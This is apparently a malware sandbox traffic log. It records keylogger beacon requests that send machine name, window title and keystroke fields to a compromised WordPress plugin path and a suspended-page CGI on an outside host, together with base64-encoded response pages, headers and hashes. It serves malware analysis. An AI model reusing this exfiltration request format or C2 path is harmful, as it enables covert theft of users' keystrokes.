ICAgICAgICAgICAgYmFja2dyb3VuZC1pbWFnZTogdXJsKGRhdGE6aW1hZ2UvcG5nO2Jhc2U2NCxp
VkJPUncwS0dnb0FBQUFOU1VoRVVnQUFBUEFBQUFEcUNBTUFBQUNyeGpoZEFBQUF0MUJNVkVVQUFB
QUFBQUQvLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8v
Ly8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8v
Ly8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy81K2ZuLy8vLy8v
Ly8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy82K3ZyLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8v
Ly8vLy8vLy8vLy8vK2k1ZWRUQUFBQVBYUlNUbE1BQVFFQ0F3UUZCZ2NJQ1FvTERBME9EeEFSRWhN
VUZSWVhHQmthR3h3ZEhoOGdJU0lqSkNVbUp5Z29LU29yTEMwdUx6QXdNVEl6TkRVMk56ZzVIN3gw
WEFBQUNuZEpSRUZVZUFIdFhYbHpHczhSN1RRM0NGa0h4cEt4aEl3dElCd2dJdVlZNHUvL3VWSjJx
cExLRDdROHQyWjd4cEQzbjZza2E5LzJiTTlNdno2b0dFeVhGb0tIZm1oZW9ld3g5Y1llaFZ1UEhN
VDRqcGh5QnROSHhIUW1ER2dCdlpqWEJ1V04yZ29nYlB5NlJ0Y09lak5QeEZrYitDRVloSENmbUo2
RFFTaGZFR2ZNdDcxRk9QZ3BFMVBIT01URVk4b1ozeUNyMlV0aUlucUVmdGozaUxNMThBZnN1L3hL
djlCNFFVenNWMVhLRlR6RFBHK0xmb0xwRS9Makpuek8wOFFDQXVnTGFsS2VxUC9tRW1XNlFqK0JQ
SUU3SVltVHl3MU1Gd2Jha3NheWJTeERDQTRTVEYrd2c4ckg3RXpNd3FOaWJZMzhtbHZYS0RkVTVw
REgzVFJrbDQwdnhKa1orRE8yTnUvM0hueUM3dDE1b2JHQnRxUkZSWG82KzBaNVlRaDVMSGQ5WUdX
T3NGKzlJczVvUVhjdFpLYnZkQUF0YkhITTgrR0xmb2pXZElnUGZmN1lpZlJUTmlabXVzVyt3OGZE
ajF4ZGV2Tm5iVTNWRmZURUwvVzMzcGZIMzFjR1lCcGdXOUxiYTNJYzhDOGlBNzdOTGU1MTR2dThC
UGo2L24zbENkL1ZrZ0tYR2t3WVVRSEFhTSt5UXVuQm1OU3diUlZZaCtrT2NnTWh2UkRCMU1kMjBZ
ZmlSK1VGZnZkSWl6cDJ2MXZWanQwdXNhMXBtTnpBWDJJRmw1L3hhRTlhcVFHU0Q2YnhJMFJaU3cz
dXVGMFlqUUhlcGpNeEhtZDlJZ0MxTmJZMVZTa2RlQjR2WE1IMEtTUVZJdlFmRVJjaU1wY2FGdFc0
SDhpSTBnQjJNemZFY1YzZ0IrSWtmRHRieUNBVGd0SEI3bDNUcktVRzJ5V09lN08yS1lRSVBFN3hG
RDEyWXZ5NlN2cW9MT01mOTVrK0J2Z3FvZ0NGQ3gyMk5kbHRPMWVwWWM3eWNFS1NhSTkrVUFZUEdP
bEtEUVl5eERQOU5wcXYwTktaa1M3R3VOUlFpZzVwdmFZUXdkVHp0alJuQ3JyL2wwYjJVZ08rd1J0
TWlGQ0F6cXBMTDBTbytoV21pNjFObjNhcUtHRXpEZkZybUVvS3FjV1NGRFJPTlNyQVUwaUZZTHJI
VTJSS0IzcStIeERIVDRKS0VlMnByaHhZMWFDUzVsWStIblh1Nk4reDZJSkNSUVFtRUV6K1lqSUUv
eHMvTW1EOHFIUllLNUNBSHVhVFk1amZReEZDL1lvSVFTU1ZhZnJEK1dLNEgwUGl2OFNBVFJaQ2hF
WGlPczM5TC9JWXdpT3hSSGdlRUtjbWJNSTljY0hSQ2R4VWVZYW5GcFFKTUJVRElGeHcxY2hKaUJB
b21rejN4NDNsK251V0dtV2hrUXMwYTZZN1lIVmU3NzJtMXRabFVCRWhLSTlrNm51TEU4YnpLVlNF
Q0VIZUNaU3lzcjA0cUpHblR6c1Z4Sm9Rd203YlBoUTdjemE1RUNHUUdwZzZUbmp6bVdCYlU3dEV4
a2hWdzM2eXozSENtMHFFdkVaOUM3dkRZWmVXQVFobktrUVVHL2k3TkRuQ0wvaHdidkpyNm1pUEtI
VGFPRTU0eHBCR3JsOFJJWEtYMWJrMytBMWFVaEh4VXRlM3NIRXZOU0lwNFJFZEJOT05BOU5PV1lF
d3VxNTRBaFBleDNOYUlRTHdISUlRbFFrUGJ3c1JGcGRtZGIvaEQ4VFNEQ3dUQnU4VzMwc1NJaVM3
UDlOd1o3Q2dBZURqbGFNOWt0QUQwK014d3JzZThYc1RhTW9SSW9DYVptZzNCUWdMcXJIVkNCdTNx
aFczK0FBT2h3cDUyUUlBZlFrQXdvREhLemZORVljazRaUHA1cWg1Q3A0VkZpTDhXTS9DbDhTRjRw
Z3RodnRIbTRxUVVJaVFkWSs1Tk1mdS8yMjhQa3EzTlpOTXFEMVc3ck1ucndKZVFFbUl3S3NhY01J
L1RWT0xsSGpRak0xWVZ0VlEzUndodk9SbzNja2lRNVpPVXpsQ09NeWk5WitMWFJFaFM1aXFySTRR
bnVObGY4b1ZFYks4QTU1NlFRSzBMTnJUajJ0aVdmY0ZuaDBoUElwWUVWR2ptQkFlMmI5NVUzd014
aW9pRXJSbTJudWhkOFFSQ0E4SXdUUkFXMU83UEFzYnRDUHlNTWdKcCsxL0lheHFHQVJ6ckZ0dHBo
VVIrTXZFUFN4KzZtL3BDeEVpM1k3cDQ4NUVTQVZtdWxkdnpTVEt3MmZxSFNHTTVoQlcxSVVJMGYv
TGRPTnRFVUtYR0M5NWpLK1JnNFFCVndObWxlUFpWalR4dW8yNGtXTXJRSGcvblp6eERxbXFGUkZD
Nzk5K2RiRWlyTW9WRVhoVkEwN1krR1dOTU9CQ3hJSXBDZ0NwQVg1S2dIQjZJUUlMSHdFM0hYazJY
UVZzemRTa0dFQ2pVQUJoUExNZFQvdUtMMFJJUThEellPS0p1OThWMDA2TGJTSWt2QnNSbHpCUFlr
SVJJSDE3NDNpRWllbEJUNGlRUmtOSHdVUU1VdFRXWHFzaVF1Z0Jpd2w3M09PclYwUklxLzYrQklQ
UFZWTHJiQVZBdWxRS0l3QU8vOWpVS3lKazUxU21PNXd3aHBIWGFjMEUzRVFFZlJJdTZUZkJZTFFu
L0ozZUNjRmRFN2k0ZHdtSGNrV0VySnNtVTdlSXNHbkx4cFZwVkVUSTRrVk0zVkNVdzErWGRSUFJh
TTBrNjRqTDFMRUZrQkJHUnc3YWQxWkUrQVZINzRYaDhOUU0vZFpNeFZLRGtQQ3lXbWJQSi84dUlR
Si9YYmlMOGJOS3Z2MHZXbExDYjBmUWpSOXp1VTF5K3NTa2pjcXNnUEF6Q1ZHRld6UHBZeEpNOUdB
TVhoR1JpbkQ4NXhrckN4RW9tRVk3STdqLzQwSUV2aldsSjd3RHpqSlp0bWJDVy9jQ2hPUFB0bElD
TUdYSUFYM1FGWVFJUmNJM0NxMlpOazN0WWR1dW5QeElwdXM4Sm9MaTVlMXUyeVdOMWt4ZDNVVjlW
WEFkdm5qbnRJa3NoMVYzQlNlL0RJVUlIQmRSQ01NVjZPbkhydFczYnhjOFZKVm1QUStJRlFtYnR5
VWdlamVtNlZzendhTko1SVFUOXI4QVVGMDQvRG9NSStOaDFaVzVNNGNoSjV5dU5STUFudjdUaDBQ
d1A3NHBUbDlValBaOEdqMTlQWVNuMFMxRlFHMlZmR3ZTUHF4cnA1Mm1CTjZJMjVuMkNUQk9PUkUw
LzZHaVZuOVlOZjhiRkJkNFJVUkZsV3pCdnlCRXFJaTRJOWFreSsycjI5NTk3L1pENjIreEtWZkJ0
Tk02cWFIUkc2MWVyWFBCT2ZPNkhON1VZbEptdXNscFdEVVRkWWFiNEwyejF2NDBoUFBCdnd6cU9s
dVR2aERCVkIyYTRJeXgvNFV4THJ4OGdveWNXMFVFZ080eTJMM0grVWw1WEkvNHZvYzZyWmtBM0Jw
djNuamZTL25oUjc4MUU1NE42dDRPZVd4UXh1a25ndUoxUzg0QVJSNFJ3QXF0bWFDRlpuUmlMMmxi
TStIYUFDNW5wcStJd0YrNmhoZkJXek5ObFc2cUNyR1hSeXphMHlOT2QxRTFmc1lVQzdVVjJKb3A3
WHlYYnN3OTBLWVVJbmpwa1JjZWNXZmtFbWRDQWVoZ3VldVRtTnQrc2hrUmVLZDN2NjduUDljTkRK
SHZvRCsreGR2cG92WEtDcDVTZm9HeEhzajB5RitJd0hVdXM3c21WaDhJSFZHSXdKdEx5N3VONlBl
L3dBbnJCeE9uQWF5SVNMV2tROHdvQkt5UisrZFVUc3VFSytMOHAyQkQ0Zkdkc2ZxaHhHUVRRWmx1
SFVMWHJSc1VGZkJFME9neklscmFSOHZrdzZxblhtdURTRjhSZ1M4dGgrZCtwaGNpOEZKZjFmd2Fw
aTQ0ckZwZnFUWkFuVytKRlJHM2tmOTRaK3NTcWRSMVVJaUkvZGMvQjZOL005V3NpQURPMDBBM1FV
MGhvaFg1UlRkZUNyc3R5VDFXcGhVUlRCZXZCYVY0aXdZSkdHY3RSREMxRnNHYVEzUnRHRmZMNG9z
MzRnNlQrQWtBVDg0YnMwZlgyd2VTODhYN1g2aFhSRERSemR3SFovNUQyaGpqZ2h0M01iNXkxTklO
cStiZVpCdThkODQ2NTd3UFlmTjhwWkJjMGcrSktpS1lpTnI5cjR2MVpydmRidGF6cDE2VFNDT2Za
cHBNaUdENmlWcXIyNzFvVm9rVTZBSjlVNUZHblhJd3c1bUgra0xFaHhJMWNsMjBRQ0dDVGdSTUEv
MytGMmxSWFh0elhoVVJQVFR0OUdRQTZoK2QvMWRFNUFuOUdSSDVvNW13SWdLSHZoQ0JpNWo2MEJj
aThvZStFS0VQclltZytRTk5PdzNQZENMZ3BCVVJPUFExOG1YMVpFeDhwOS8vSWkwcWMzUWk2Q21B
VTFkRXBEOVNBMXRUOTgvR1phZHZmMjlHeFBZUGg5bitNakF1Uk5nL0hjNFdZbThXalQwcEFCTkI3
V2tBYjgxa3o4ZkVvNU5hMHJBUVlVOEtRRVdFUFNrQWFhZm5SUGlYRUdIUENDYmNueHBoSUVQUG5o
WGM5WGtSTnVIaDNDdzhKWHRlZUNWN1pqZy93dWE4WUdsM1h2RFVQeS9jL0F2ZDQvaE5EU3FlZ1FB
QUFBQkpSVTVFcmtKZ2dnPT0pOwogICAgICAgICAgICB9CiAgICAgICAgICAgIC5jb250YWluZXIg
ewogICAgICAgICAgICAgICAgd2lkdGg6IDcwJTsKICAgICAgICAgICAgfQogICAgICAgICAgICAu
c3RhdHVzLXJlYXNvbiB7CiAgICAgICAgICAgICAgICBmb250LXNpemU6IDQ1MCU7CiAgICAgICAg
ICAgIH0KICAgICAgICAgICAgLmluZm8taGVhZGluZyB7CiAgICAgICAgICAgICAgICBmb250LXNp
emU6IDIwMCU7CiAgICAgICAgICAgIH0KICAgICAgICAgICAgLnJlYXNvbi10ZXh0IHsKICAgICAg
ICAgICAgICAgIGZvbnQtc2l6ZTogMTYwJTsKICAgICAgICAgICAgfQogICAgICAgIH0KICAgIDwv
c3R5bGU+CiAgICA8L2hlYWQ+CiAgICA8Ym9keT4KICAgICAgICA8ZGl2IGNsYXNzPSJjb250YWlu
ZXIiPgogICAgICAgICAgICA8c3BhbiBjbGFzcz0ic3RhdHVzLXJlYXNvbiI+CiAgICAgICAgICAg
ICAgICA8aSBjbGFzcz0iZmEgZmEtdXNlci10aW1lcyBmYS0yeCI+PC9pPiBBY2NvdW50IFN1c3Bl
bmRlZAogICAgICAgICAgICA8L3NwYW4+CiAgICAgICAgPC9kaXY+CiAgICAgICAgPHNlY3Rpb24g
Y2xhc3M9ImFkZGl0aW9uYWwtaW5mbyI+CiAgICAgICAgICAgIDxkaXYgY2xhc3M9ImNvbnRhaW5l
ciI+CiAgICAgICAgICAgICAgICA8ZGl2IGNsYXNzPSJhZGRpdGlvbmFsLWluZm8taXRlbXMiPgog
ICAgICAgICAgICAgICAgICAgIDxkaXYgY2xhc3M9ImluZm8taGVhZGluZyI+CiAgICAgICAgICAg
ICAgICAgICAgICAgIFRoaXMgQWNjb3VudCBoYXMgYmVlbiBzdXNwZW5kZWQuCiAgICAgICAgICAg
ICAgICAgICAgPC9kaXY+CiAgICAgICAgICAgICAgICAgICAgPGRpdiBjbGFzcz0icmVhc29uLXRl
eHQiPgogICAgICAgICAgICAgICAgICAgICAgICBDb250YWN0IHlvdXIgaG9zdGluZyBwcm92aWRl
ciBmb3IgbW9yZSBpbmZvcm1hdGlvbi4KICAgICAgICAgICAgICAgICAgICA8L2Rpdj4KICAgICAg
ICAgICAgICAgIDwvZGl2PgogICAgICAgICAgICA8L2Rpdj4KICAgICAgICA8L3NlY3Rpb24+CiAg
ICA8L2JvZHk+CjwvaHRtbD4K
Download
Download
SHA256
17fa2f3324d45c27a318ed51dab739c7f09b573185b76889b955ad2c9ad1d7b8
Referer
Magic
HyperText Markup Language (HTML)
Request
GET /cgi-sys/suspendedpage.cgi?type=keystrokes&machinename=WIN1&windowtitle=rundll32.exe&keystrokestyped=&machinetime=1:53%20PM HTTP/1.1
Host: zonne-lening.nl
Response Header
HTTP/1.1 200 OK
Date: Tue, 29 Nov 2016 21:53:51 GMT
Server: Apache/2.4.23 (Unix) OpenSSL/1.0.1e-fips mod_bwlimited/1.4
Transfer-Encoding: chunked
Content-Type: text/html
Response Peek (128 B)
<!DOCTYPE html>
<html>
<head>
<meta http-equiv="Content-type" content="text/html; charset=utf-8">
<meta http-equiv="...
4 /wp-content/plugins/advanced-custom-fields/rajah/post.php?type=keystrokes&machinename=WIN1&windowtitle=C:%5CUsers%5CAdministrator%5CDesktop%5Cmalware&keystrokestyped=&machinetime=1:53%20PM text/html post.php 302 Found HTML 379.0 B 03/17/39 16:32:16
PCFET0NUWVBFIEhUTUwgUFVCTElDICItLy9JRVRGLy9EVEQgSFRNTCAyLjAvL0VOIj4KPGh0bWw+
PGhlYWQ+Cjx0aXRsZT4zMDIgRm91bmQ8L3RpdGxlPgo8L2hlYWQ+PGJvZHk+CjxoMT5Gb3VuZDwv
aDE+CjxwPlRoZSBkb2N1bWVudCBoYXMgbW92ZWQgPGEgaHJlZj0iaHR0cDovL3pvbm5lLWxlbmlu
Zy5ubC9jZ2ktc3lzL3N1c3BlbmRlZHBhZ2UuY2dpP3R5cGU9a2V5c3Ryb2tlcyZhbXA7bWFjaGlu
ZW5hbWU9V0lOMSZhbXA7d2luZG93dGl0bGU9QzolNUNVc2VycyU1Q0FkbWluaXN0cmF0b3IlNUNE
ZXNrdG9wJTVDbWFsd2FyZSZhbXA7a2V5c3Ryb2tlc3R5cGVkPSZhbXA7bWFjaGluZXRpbWU9MTo1
MyUyMFBNIj5oZXJlPC9hPi48L3A+CjwvYm9keT48L2h0bWw+Cg==
Download
Download
SHA256
3547559064d8c1d4a59939ecf36281cf4e0eb02872540efd547e14e421121faf
Referer
Magic
HyperText Markup Language (HTML)
Request
GET /wp-content/plugins/advanced-custom-fields/rajah/post.php?type=keystrokes&machinename=WIN1&windowtitle=C:%5CUsers%5CAdministrator%5CDesktop%5Cmalware&keystrokestyped=&machinetime=1:53%20PM HTTP/1.1
Host: zonne-lening.nl
Response Header
HTTP/1.1 302 Found
Date: Tue, 29 Nov 2016 21:53:52 GMT
Server: Apache/2.4.23 (Unix) OpenSSL/1.0.1e-fips mod_bwlimited/1.4
Location: http://zonne-lening.nl/cgi-sys/suspendedpage.cgi?type=keystrokes&machinename=WIN1&windowtitle=C:%5CUsers%5CAdministrator%5CDesktop%5Cmalware&keystrokestyped=&machinetime=1:53%20PM
Content-Length: 379
Content-Type: text/html; charset=iso-8859-1
Response Peek (128 B)
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The doc...
5 /cgi-sys/suspendedpage.cgi?type=keystrokes&machinename=WIN1&windowtitle=C:%5CUsers%5CAdministrator%5CDesktop%5Cmalware&keystrokestyped=&machinetime=1:53%20PM text/html suspendedpage.cgi 200 OK HTML 7.1 KB 03/17/39 23:13:23
PCFET0NUWVBFIGh0bWw+CjxodG1sPgogICAgPGhlYWQ+CiAgICA8bWV0YSBodHRwLWVxdWl2PSJD
b250ZW50LXR5cGUiIGNvbnRlbnQ9InRleHQvaHRtbDsgY2hhcnNldD11dGYtOCI+CiAgICA8bWV0
YSBodHRwLWVxdWl2PSJDYWNoZS1jb250cm9sIiBjb250ZW50PSJuby1jYWNoZSI+CiAgICA8bWV0
YSBodHRwLWVxdWl2PSJQcmFnbWEiIGNvbnRlbnQ9Im5vLWNhY2hlIj4KICAgIDxtZXRhIGh0dHAt
ZXF1aXY9IkV4cGlyZXMiIGNvbnRlbnQ9IjAiPgogICAgPG1ldGEgbmFtZT0idmlld3BvcnQiIGNv
bnRlbnQ9IndpZHRoPWRldmljZS13aWR0aCwgaW5pdGlhbC1zY2FsZT0xLjAiPgogICAgPHRpdGxl
PkFjY291bnQgU3VzcGVuZGVkPC90aXRsZT4KICAgIDxsaW5rIHJlbD0ic3R5bGVzaGVldCIgaHJl
Zj0iLy9tYXhjZG4uYm9vdHN0cmFwY2RuLmNvbS9mb250LWF3ZXNvbWUvNC4zLjAvY3NzL2ZvbnQt
YXdlc29tZS5taW4uY3NzIj4KICAgIDxzdHlsZSB0eXBlPSJ0ZXh0L2NzcyI+CiAgICAgICAgYm9k
eSB7CiAgICAgICAgICAgIGZvbnQtZmFtaWx5OiBBcmlhbCwgSGVsdmV0aWNhLCBzYW5zLXNlcmlm
OwogICAgICAgICAgICBmb250LXNpemU6IDE0cHg7CiAgICAgICAgICAgIGxpbmUtaGVpZ2h0OiAx
LjQyODU3MTQyOTsKICAgICAgICAgICAgYmFja2dyb3VuZC1jb2xvcjogI2ZmZmZmZjsKICAgICAg
ICAgICAgY29sb3I6ICMyRjMyMzA7CiAgICAgICAgICAgIHBhZGRpbmc6IDA7CiAgICAgICAgICAg
IG1hcmdpbjogMDsKICAgICAgICB9CiAgICAgICAgc2VjdGlvbiB7CiAgICAgICAgICAgIGRpc3Bs
YXk6IGJsb2NrOwogICAgICAgICAgICBwYWRkaW5nOiAwOwogICAgICAgICAgICBtYXJnaW46IDA7
CiAgICAgICAgfQogICAgICAgIC5jb250YWluZXIgewogICAgICAgICAgICBtYXJnaW4tbGVmdDog
YXV0bzsKICAgICAgICAgICAgbWFyZ2luLXJpZ2h0OiBhdXRvOwogICAgICAgICAgICBwYWRkaW5n
OiAwIDEwcHg7CiAgICAgICAgfQogICAgICAgIC5hZGRpdGlvbmFsLWluZm8gewogICAgICAgICAg
ICBiYWNrZ3JvdW5kLXJlcGVhdDogbm8tcmVwZWF0OwogICAgICAgICAgICBiYWNrZ3JvdW5kLWNv
bG9yOiAjMjkzQTRBOwogICAgICAgICAgICBjb2xvcjogI0ZGRkZGRjsKICAgICAgICB9CiAgICAg
ICAgLmFkZGl0aW9uYWwtaW5mby1pdGVtcyB7CiAgICAgICAgICAgIHBhZGRpbmc6IDIwcHg7CiAg
ICAgICAgICAgIG1pbi1oZWlnaHQ6IDE5M3B4OwogICAgICAgIH0KICAgICAgICAuaW5mby1oZWFk
aW5nIHsKICAgICAgICAgICAgZm9udC13ZWlnaHQ6IGJvbGQ7CiAgICAgICAgICAgIHRleHQtYWxp
Z246IGxlZnQ7CiAgICAgICAgICAgIHdvcmQtYnJlYWs6IGJyZWFrLWFsbDsKICAgICAgICAgICAg
d2lkdGg6IDEwMCU7CiAgICAgICAgfQogICAgICAgIC5zdGF0dXMtcmVhc29uIHsKICAgICAgICAg
ICAgZm9udC1zaXplOiAyMDAlOwogICAgICAgICAgICBkaXNwbGF5OiBibG9jazsKICAgICAgICAg
ICAgY29sb3I6ICNDQ0NDQ0M7CiAgICAgICAgfQogICAgICAgIC5yZWFzb24tdGV4dCB7CiAgICAg
ICAgICAgIG1hcmdpbjogMjBweCAwOwogICAgICAgICAgICBmb250LXNpemU6IDE2cHg7CiAgICAg
ICAgfQogICAgICAgIC5pbmZvLWhlYWRpbmcgewogICAgICAgICAgICBmb250LXNpemU6IDE5MCU7
CiAgICAgICAgfQogICAgICAgIC5yZWFzb24tdGV4dCB7CiAgICAgICAgICAgIGZvbnQtc2l6ZTog
MTQwJTsKICAgICAgICB9CiAgICAgICAgQG1lZGlhIChtaW4td2lkdGg6IDc2OHB4KSB7CiAgICAg
ICAgICAgIC5hZGRpdGlvbmFsLWluZm8gewogICAgICAgICAgICAgICAgcG9zaXRpb246IHJlbGF0
aXZlOwogICAgICAgICAgICAgICAgb3ZlcmZsb3c6IGhpZGRlbjsKICAgICAgICAgICAgICAgIGJh
Y2tncm91bmQtaW1hZ2U6IG5vbmU7CiAgICAgICAgICAgIH0KICAgICAgICAgICAgLmFkZGl0aW9u
YWwtaW5mby1pdGVtcyB7CiAgICAgICAgICAgICAgICBwYWRkaW5nOiAyMHB4OwogICAgICAgICAg
ICB9CiAgICAgICAgICAgIC5jb250YWluZXIgewogICAgICAgICAgICAgICAgd2lkdGg6IDkwJTsK
ICAgICAgICAgICAgfQogICAgICAgICAgICAuc3RhdHVzLXJlYXNvbiB7CiAgICAgICAgICAgICAg
ICBkaXNwbGF5OiBpbmxpbmU7CiAgICAgICAgICAgIH0KICAgICAgICB9CiAgICAgICAgQG1lZGlh
IChtaW4td2lkdGg6IDk5MnB4KSB7CiAgICAgICAgICAgIC5hZGRpdGlvbmFsLWluZm8gewogICAg
ICAgICAgICAgICAgYmFja2dyb3VuZC1pbWFnZTogdXJsKGRhdGE6aW1hZ2UvcG5nO2Jhc2U2NCxp
VkJPUncwS0dnb0FBQUFOU1VoRVVnQUFBUEFBQUFEcUNBTUFBQUNyeGpoZEFBQUF0MUJNVkVVQUFB
QUFBQUQvLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8v
Ly8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8v
Ly8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy81K2ZuLy8vLy8v
Ly8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy82K3ZyLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8v
Ly8vLy8vLy8vLy8vK2k1ZWRUQUFBQVBYUlNUbE1BQVFFQ0F3UUZCZ2NJQ1FvTERBME9EeEFSRWhN
VUZSWVhHQmthR3h3ZEhoOGdJU0lqSkNVbUp5Z29LU29yTEMwdUx6QXdNVEl6TkRVMk56ZzVIN3gw
WEFBQUNuZEpSRUZVZUFIdFhYbHpHczhSN1RRM0NGa0h4cEt4aEl3dElCd2dJdVlZNHUvL3VWSjJx
cExLRDdROHQyWjd4cEQzbjZza2E5LzJiTTlNdno2b0dFeVhGb0tIZm1oZW9ld3g5Y1llaFZ1UEhN
VDRqcGh5QnROSHhIUW1ER2dCdlpqWEJ1V04yZ29nYlB5NlJ0Y09lak5QeEZrYitDRVloSENmbUo2
RFFTaGZFR2ZNdDcxRk9QZ3BFMVBIT01URVk4b1ozeUNyMlV0aUlucUVmdGozaUxNMThBZnN1L3hL
djlCNFFVenNWMVhLRlR6RFBHK0xmb0xwRS9Makpuek8wOFFDQXVnTGFsS2VxUC9tRW1XNlFqK0JQ
SUU3SVltVHl3MU1Gd2Jha3NheWJTeERDQTRTVEYrd2c4ckg3RXpNd3FOaWJZMzhtbHZYS0RkVTVw
REgzVFJrbDQwdnhKa1orRE8yTnUvM0hueUM3dDE1b2JHQnRxUkZSWG82KzBaNVlRaDVMSGQ5WUdX
T3NGKzlJczVvUVhjdFpLYnZkQUF0YkhITTgrR0xmb2pXZElnUGZmN1lpZlJUTmlabXVzVyt3OGZE
ajF4ZGV2Tm5iVTNWRmZURUwvVzMzcGZIMzFjR1lCcGdXOUxiYTNJYzhDOGlBNzdOTGU1MTR2dThC
UGo2L24zbENkL1ZrZ0tYR2t3WVVRSEFhTSt5UXVuQm1OU3diUlZZaCtrT2NnTWh2UkRCMU1kMjBZ
ZmlSK1VGZnZkSWl6cDJ2MXZWanQwdXNhMXBtTnpBWDJJRmw1L3hhRTlhcVFHU0Q2YnhJMFJaU3cz
dXVGMFlqUUhlcGpNeEhtZDlJZ0MxTmJZMVZTa2RlQjR2WE1IMEtTUVZJdlFmRVJjaU1wY2FGdFc0
SDhpSTBnQjJNemZFY1YzZ0IrSWtmRHRieUNBVGd0SEI3bDNUcktVRzJ5V09lN08yS1lRSVBFN3hG
RDEyWXZ5NlN2cW9MT01mOTVrK0J2Z3FvZ0NGQ3gyMk5kbHRPMWVwWWM3eWNFS1NhSTkrVUFZUEdP
bEtEUVl5eERQOU5wcXYwTktaa1M3R3VOUlFpZzVwdmFZUXdkVHp0alJuQ3JyL2wwYjJVZ08rd1J0
TWlGQ0F6cXBMTDBTbytoV21pNjFObjNhcUtHRXpEZkZybUVvS3FjV1NGRFJPTlNyQVUwaUZZTHJI
VTJSS0IzcStIeERIVDRKS0VlMnByaHhZMWFDUzVsWStIblh1Nk4reDZJSkNSUVFtRUV6K1lqSUUv
eHMvTW1EOHFIUllLNUNBSHVhVFk1amZReEZDL1lvSVFTU1ZhZnJEK1dLNEgwUGl2OFNBVFJaQ2hF
WGlPczM5TC9JWXdpT3hSSGdlRUtjbWJNSTljY0hSQ2R4VWVZYW5GcFFKTUJVRElGeHcxY2hKaUJB
b21rejN4NDNsK251V0dtV2hrUXMwYTZZN1lIVmU3NzJtMXRabFVCRWhLSTlrNm51TEU4YnpLVlNF
Q0VIZUNaU3lzcjA0cUpHblR6c1Z4Sm9Rd203YlBoUTdjemE1RUNHUUdwZzZUbmp6bVdCYlU3dEV4
a2hWdzM2eXozSENtMHFFdkVaOUM3dkRZWmVXQVFobktrUVVHL2k3TkRuQ0wvaHdidkpyNm1pUEtI
VGFPRTU0eHBCR3JsOFJJWEtYMWJrMytBMWFVaEh4VXRlM3NIRXZOU0lwNFJFZEJOT05BOU5PV1lF
d3VxNTRBaFBleDNOYUlRTHdISUlRbFFrUGJ3c1JGcGRtZGIvaEQ4VFNEQ3dUQnU4VzMwc1NJaVM3
UDlOd1o3Q2dBZURqbGFNOWt0QUQwK014d3JzZThYc1RhTW9SSW9DYVptZzNCUWdMcXJIVkNCdTNx
aFczK0FBT2h3cDUyUUlBZlFrQXdvREhLemZORVljazRaUHA1cWg1Q3A0VkZpTDhXTS9DbDhTRjRw
Z3RodnRIbTRxUVVJaVFkWSs1Tk1mdS8yMjhQa3EzTlpOTXFEMVc3ck1ucndKZVFFbUl3S3NhY01J
L1RWT0xsSGpRak0xWVZ0VlEzUndodk9SbzNja2lRNVpPVXpsQ09NeWk5WitMWFJFaFM1aXFySTRR
bnVObGY4b1ZFYks4QTU1NlFRSzBMTnJUajJ0aVdmY0ZuaDBoUElwWUVWR2ptQkFlMmI5NVUzd014
aW9pRXJSbTJudWhkOFFSQ0E4SXdUUkFXMU83UEFzYnRDUHlNTWdKcCsxL0lheHFHQVJ6ckZ0dHBo
VVIrTXZFUFN4KzZtL3BDeEVpM1k3cDQ4NUVTQVZtdWxkdnpTVEt3MmZxSFNHTTVoQlcxSVVJMGYv
TGRPTnRFVUtYR0M5NWpLK1JnNFFCVndObWxlUFpWalR4dW8yNGtXTXJRSGcvblp6eERxbXFGUkZD
Nzk5K2RiRWlyTW9WRVhoVkEwN1krR1dOTU9CQ3hJSXBDZ0NwQVg1S2dIQjZJUUlMSHdFM0hYazJY
UVZzemRTa0dFQ2pVQUJoUExNZFQvdUtMMFJJUThEellPS0p1OThWMDA2TGJTSWt2QnNSbHpCUFlr
SVJJSDE3NDNpRWllbEJUNGlRUmtOSHdVUU1VdFRXWHFzaVF1Z0Jpd2w3M09PclYwUklxLzYrQklQ
UFZWTHJiQVZBdWxRS0l3QU8vOWpVS3lKazUxU21PNXd3aHBIWGFjMEUzRVFFZlJJdTZUZkJZTFFu
L0ozZUNjRmRFN2k0ZHdtSGNrV0VySnNtVTdlSXNHbkx4cFZwVkVUSTRrVk0zVkNVdzErWGRSUFJh
TTBrNjRqTDFMRUZrQkJHUnc3YWQxWkUrQVZINzRYaDhOUU0vZFpNeFZLRGtQQ3lXbWJQSi84dUlR
Si9YYmlMOGJOS3Z2MHZXbExDYjBmUWpSOXp1VTF5K3NTa2pjcXNnUEF6Q1ZHRld6UHBZeEpNOUdB
TVhoR1JpbkQ4NXhrckN4RW9tRVk3STdqLzQwSUV2aldsSjd3RHpqSlp0bWJDVy9jQ2hPUFB0bElD
TUdYSUFYM1FGWVFJUmNJM0NxMlpOazN0WWR1dW5QeElwdXM4Sm9MaTVlMXUyeVdOMWt4ZDNVVjlW
WEFkdm5qbnRJa3NoMVYzQlNlL0RJVUlIQmRSQ01NVjZPbkhydFczYnhjOFZKVm1QUStJRlFtYnR5
VWdlamVtNlZzendhTko1SVFUOXI4QVVGMDQvRG9NSStOaDFaVzVNNGNoSjV5dU5STUFudjdUaDBQ
d1A3NHBUbDlValBaOEdqMTlQWVNuMFMxRlFHMlZmR3ZTUHF4cnA1Mm1CTjZJMjVuMkNUQk9PUkUw
LzZHaVZuOVlOZjhiRkJkNFJVUkZsV3pCdnlCRXFJaTRJOWFreSsycjI5NTk3L1pENjIreEtWZkJ0
